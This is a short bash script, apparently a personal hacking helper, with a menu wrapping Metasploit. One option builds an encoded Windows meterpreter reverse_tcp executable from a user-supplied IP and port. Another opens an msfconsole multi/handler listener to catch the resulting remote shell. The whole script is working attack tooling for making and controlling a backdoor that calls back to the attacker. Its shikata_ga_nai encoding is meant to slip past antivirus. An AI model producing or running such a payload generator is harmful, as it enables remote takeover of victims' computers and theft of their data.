#!/bin/bash

x=0
while [ $x = 0 ]
do
	clear
	echo ""
	echo -e "               \e[1;34m  __    __     ______     ______   ______       \e[0m"
	sleep 0.01
	echo -e "               \e[1;34m /\  -./  \   /\  ___\   /\__  _\ /\  __ \	\e[0m"
	sleep 0.01
	echo -e "               \e[1;34m \ \ \-./\ \  \ \  __\   \/_/\ \/ \ \  __ \	\e[0m"
	sleep 0.01
	echo -e "               \e[1;34m  \ \_\ \ \_\  \ \_____\    \ \_\  \ \_\ \_\ 	\e[0m"
	sleep 0.01
        echo -e "               \e[1;34m   \/_/  \/_/   \/_____/     \/_/   \/_/\/_/\e[0m  \e[37m-By Ed\e[0m"
	echo ""
	echo ""
	echo ""
	echo ""
	echo " Options:"
	echo ""
	echo -e "  [1] Create File \e[31m(Set payload IP)\e[0m"  
	echo ""
	echo -e "  [2] Open msfconsole \e[31m(Set listener IP & exploit)\e[0m"
	echo ""
	echo "  [3] Exit "
	echo ""
	echo ""
	read answer
	
	case "$answer" in
	1)
	clear
	echo "Enter your IP:"
	read ip	
	clear
	echo "Enter Port:"
	read port
	clear
	echo "Name payload file:"
	read fn
	echo ""
	echo -e " \e[31mCreating File..\e[0m"
	echo ""
	clear
	msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -b "\x00" -e x86/shikata_ga_nai -f exe > /root/Desktop/$fn.exe 
	echo ""
	echo -e " \e[32mFile Created\e[0m"
	sleep 1

	x=0	
	;;
	2)
	clear
	echo "Enter IP:"
	read lhst
	clear
	msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LPORT 4444; set LHOST $lhst; run;"
	
	x=1
	;;
	3)
	clear
	echo "Exiting.."
	clear
	exit
	clear
	
	x=1
	;;
	*) 
	clear
	echo "Unknown command"
	
	;;
	
	
	

esac

done
